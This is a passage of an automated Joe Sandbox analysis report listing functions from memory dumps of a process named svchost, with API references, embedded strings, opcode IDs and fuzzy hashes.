            Function 00007FFA4184BDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00007FFA4184D3D0: __std_exception_copy.LIBVCRUNTIME ref: 00007FFA4184D409
              • Part of subcall function 00007FFA41853F98: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
              • Part of subcall function 00007FFA41853F98: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA4184BF54
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise__std_exception_copy_invalid_parameter_noinfo_noreturn
            • String ID: while $Could not copy string: buffer too small. $Started new
            • API String ID: 2766386702-1576623956
            • Opcode ID: abc52593c5aa7f26896bc6e9f99c277f2370ea78ae2b0868c246c5b268dbbbb2
            • Instruction ID: 0eac01a92fb77ac5d2864b8d0355b94f806d93396bbc355211c730db8d756097
            • Opcode Fuzzy Hash: abc52593c5aa7f26896bc6e9f99c277f2370ea78ae2b0868c246c5b268dbbbb2
            • Instruction Fuzzy Hash: 02412962B1C68586EB13EF25E8143AA7361FB82BC8F549131EF5C076A6DF3CE0458300
            Function 00007FFA417E7080 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name
            • API String ID: 2775327233-1405518554
            • Opcode ID: 4252728e7fb0e3ceebf6642528e8046b07c0a08d2690982116d063fcbd796f9d
            • Instruction ID: c311a4d0b88695e21efa377d412971b9e0b2bd3909974d943286846860e3cc17
            • Opcode Fuzzy Hash: 4252728e7fb0e3ceebf6642528e8046b07c0a08d2690982116d063fcbd796f9d
            • Instruction Fuzzy Hash: 49416C22B0EB4189FB57EFB0D4906BD23B4EF95708F448434DA4D27A6ADE38E5119384
            Function 00007FFA417CC130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name
            • API String ID: 2775327233-1405518554
            • Opcode ID: c424e5753162e9c814d6d170367190a69bee1575cf1b809c600f7e715cdca093
            • Instruction ID: 4cf9d6b2f3150e52bb079ddb0e4ef50547a5094d361e32e840fb522f512f643d
            • Opcode Fuzzy Hash: c424e5753162e9c814d6d170367190a69bee1575cf1b809c600f7e715cdca093
            • Instruction Fuzzy Hash: 36414D22B0EA41C9EB17EFB1D4902BD27B4EF46748F448434DE4D27A66EE38E5169348
            Function 68290DA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
            • API String ID: 0-1261492566
            • Opcode ID: da8ce11a2fade850127e0c5378c7a24e8e704a5545f603b45819f770f16e41ff
            • Instruction ID: e60f911440a172068f12104ac4e70cbbdd0ac0ef6e8d3bd44c5d4504c6dad859
            • Opcode Fuzzy Hash: da8ce11a2fade850127e0c5378c7a24e8e704a5545f603b45819f770f16e41ff
            • Instruction Fuzzy Hash: 9221F7727100098BDF1C8E3F9810B397692E788794FD8C229DE26CB7D4E679D840C740
            Function 6828EA10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID:
            • String ID: PRINTF_EXPONENT_DIGITS$gfff$gfff
            • API String ID: 0-1261492566
            • Opcode ID: 85955a5085edaaf0561074ca5ca8f770628616aab478941b9f37ea72fd5f7d96
            • Instruction ID: f0728a63a2fa41e00105a4ea9d10a082bc03974b8ff5ce3e6025864f6d96f453
            • Opcode Fuzzy Hash: 85955a5085edaaf0561074ca5ca8f770628616aab478941b9f37ea72fd5f7d96
            • Instruction Fuzzy Hash: BC214BB67100458BDF0C8F3FA850A2A7692B789B94F98C739DD26CB7D4E678D904CB40
            Function 00007FFA417E9C80 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: AES$CBC
            • API String ID: 3668304517-790673706
            • Opcode ID: 76d240fd3c33c7ba6198269a7bda107d709a31a73a34590b55f8cad2748d08b0
            • Instruction ID: 29d009faf4ce179f3465e8e0b82db12ca54198e5b80e8cbc58ca9b9a975c6ce2
            • Opcode Fuzzy Hash: 76d240fd3c33c7ba6198269a7bda107d709a31a73a34590b55f8cad2748d08b0
            • Instruction Fuzzy Hash: 06419263D1CBC581E712DB24D441369A361FBEA7D8F509321EA9C026A7EF6CE1C0C740
            Function 00007FFA41848150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
            Download Yara Rule
            APIs
            • #14.LIBPQ(?,?,?,?,?,?,?,?,?,?,00000000,00007FFA418488BE), ref: 00007FFA41848178
              • Part of subcall function 00007FFA4184D310: __std_exception_copy.LIBVCRUNTIME ref: 00007FFA4184D349
              • Part of subcall function 00007FFA41853F98: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41853FE8
              • Part of subcall function 00007FFA41853F98: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA4184EF3E), ref: 00007FFA41854029
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFileHeaderRaise__std_exception_copy
            • String ID: Could not obtain client encoding.$Lost connection to the database server.$No connection to database
            • API String ID: 3973727643-926990768
            • Opcode ID: cf6f982c9a0c012c23f4ece425d1302d482c234e1a75a747cd0c2b907e48ff14
            • Instruction ID: 8458c6e16a679da561df45413b537fbf531aae1422ac604ad0152aacba8cf069
            • Opcode Fuzzy Hash: cf6f982c9a0c012c23f4ece425d1302d482c234e1a75a747cd0c2b907e48ff14
            • Instruction Fuzzy Hash: 60118122B2C94791EF13FB60E4910B82360EF96788FA0D532E54E865B6EE6CF504C700
            Function 68281430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: _Jv_RegisterClasses$libgcj-16.dll
            • API String ID: 1646373207-328863460
            • Opcode ID: 58a78faa62b6ea0adafa5f67330d527f61d12f84308a401e3d504159fb202e35
            • Instruction ID: abc870a32fdd0affd7bd39a118d3dd5c1713376495ffab325016c1d358ec94e8
            • Opcode Fuzzy Hash: 58a78faa62b6ea0adafa5f67330d527f61d12f84308a401e3d504159fb202e35
            • Instruction Fuzzy Hash: 95F05EB461260AD4FE099B66E8A436422E6BF44B95FC48225C42E063F1EF2EC1EDC740
            Function 68295044 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 11libraryloaderCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: _get_output_format$msvcrt.dll
            • API String ID: 1646373207-3432234555
            • Opcode ID: 09177e8ed118ef47efb88fbb65359de9a8f64e5846bf0d2c5c23e6c55361faa6
            • Instruction ID: f653141790658bc172c86a7e61f1d616f1332d7f6b00e7acaa975b84ae96483c
            • Opcode Fuzzy Hash: 09177e8ed118ef47efb88fbb65359de9a8f64e5846bf0d2c5c23e6c55361faa6
            • Instruction Fuzzy Hash: ADD06774601B1BD1EE08DB56F9B530423A2BB05B99F40D715C40E43334EF7E8165D300
            Function 682852C0 Relevance: 6.5, APIs: 5, Instructions: 237COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: freememcpy$malloc
            • String ID:
            • API String ID: 169112436-0
            • Opcode ID: 50021c32a11f02c3b2ae97c7a92e49f7883138b21f1e2bce741569c1d457c20b
            • Instruction ID: b8b6b418da4433def4fda2c62a00e56fd928196d4e6d6da1984d6febaeefa589
            • Opcode Fuzzy Hash: 50021c32a11f02c3b2ae97c7a92e49f7883138b21f1e2bce741569c1d457c20b
            • Instruction Fuzzy Hash: C3914AB2219A5989DF20CF19E58476E7BB2F74578AFD48212DAAE037D8DB3DC149C700
            Function 68285460 Relevance: 6.3, APIs: 5, Instructions: 98COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: freemallocmemcpy
            • String ID:
            • API String ID: 3056473165-0
            • Opcode ID: d34ad63fa52c71e76510cc089053b9a2d3557ca37e7ac155e7b10e5618d7cdca
            • Instruction ID: 80a85a36751b7c900f9ddcfc534600054c3a2239c8d850a34ca140175f71beb3
            • Opcode Fuzzy Hash: d34ad63fa52c71e76510cc089053b9a2d3557ca37e7ac155e7b10e5618d7cdca
            • Instruction Fuzzy Hash: 2131CE66305A9981DF10CF19E1842AD6765F745BE5FC58326DEBE037D4EB38C58AC300
            Function 00007FFA417EAE90 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Module$FileHandleName
            • String ID:
            • API String ID: 4146042529-0
            • Opcode ID: e47fd779217bb8090bcb97b65ce2a9578e2943490f767472053137179614f9cb
            • Instruction ID: ef08e0ff869ce74df92dd8749ea99b1ce9db867eb529d5530017082c4dd8e5b2
            • Opcode Fuzzy Hash: e47fd779217bb8090bcb97b65ce2a9578e2943490f767472053137179614f9cb
            • Instruction Fuzzy Hash: 8FD1B562B1C74681EFA3AB65D04067D67F1EB96794F408232DA5D036F6EF7CE4818B08
            Function 00007FFA418788A0 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileWrite$ConsoleErrorLastOutput
            • String ID:
            • API String ID: 2718003287-0
            • Opcode ID: 1b61a4e8174339c00db027f7e095faac564e5b2ade362b7f700190a936d0d0dc
            • Instruction ID: 970a1ffe7c1e56a36b9b1a1384112f48a5bf3b92f3047f8eb7e6a30a5dd89a78
            • Opcode Fuzzy Hash: 1b61a4e8174339c00db027f7e095faac564e5b2ade362b7f700190a936d0d0dc
            • Instruction Fuzzy Hash: 0AD1F532B1CA8589E713DFB5D8402AC3BB1F756798B448136CE6D97BA9DE38E106C340
            Function 00007FFA4185B02C Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            • API String ID: 2943138195-0
            • Opcode ID: dcdacedb055badd74f445e9a6a145a0ea98844aa0463c365f974ab973e89a949
            • Instruction ID: c6516e949ad9a79a73b0f5bd7354431417e00706fe30c50bf5ba53999987fe38
            • Opcode Fuzzy Hash: dcdacedb055badd74f445e9a6a145a0ea98844aa0463c365f974ab973e89a949
            • Instruction Fuzzy Hash: 8D914826E0CA52C9FB13AFA0D8403BC37A2FB9674CF548036CA4D676A5DF78A845C754
            Function 00007FFA417C2EF0 Relevance: 6.2, APIs: 4, Instructions: 172COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
            • String ID:
            • API String ID: 1346393832-0
            • Opcode ID: f362911b3223d89d2d6da790382d0523f49971395092a3d5cad46bf814ef5ef0
            • Instruction ID: e34d985e487d6793ceb4cca69030b944afe14a1a07fbe9eaa3972d2c66c2a522
            • Opcode Fuzzy Hash: f362911b3223d89d2d6da790382d0523f49971395092a3d5cad46bf814ef5ef0
            • Instruction Fuzzy Hash: CC51FB22B0CB8581EB12AF25E54036D6361EB46BD8F54C131EB5C07BA6EF7CE4D18740
            Function 68294890 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
            Download Yara Rule
            APIs
            • IsDBCSLeadByteEx.KERNEL32 ref: 682948ED
            • MultiByteToWideChar.KERNEL32 ref: 6829492D
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Byte$CharLeadMultiWide
            • String ID:
            • API String ID: 2561704868-0
            • Opcode ID: ccc6a07d604aef474372a0d5ced22c01b86187b091dacb2da16cd17ea3ba90ae
            • Instruction ID: aec0926e6471e9e8c25494d34f5ba446f26d8992a27b114b2891c6cd51b67b3f
            • Opcode Fuzzy Hash: ccc6a07d604aef474372a0d5ced22c01b86187b091dacb2da16cd17ea3ba90ae
            • Instruction Fuzzy Hash: 8C31B6726186C58AEB318F26F41478A7661F785759F844215EAF857B95CB3DC481CB00
            Function 00007FFA4185DC40 Relevance: 6.1, APIs: 4, Instructions: 87COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+$Replicator::operator[]
            • String ID:
            • API String ID: 3863519203-0
            • Opcode ID: 0a1daafbaf6965e1d57f7a53026d3bafdaada2f90dbaa08ebd26bc263fa036db
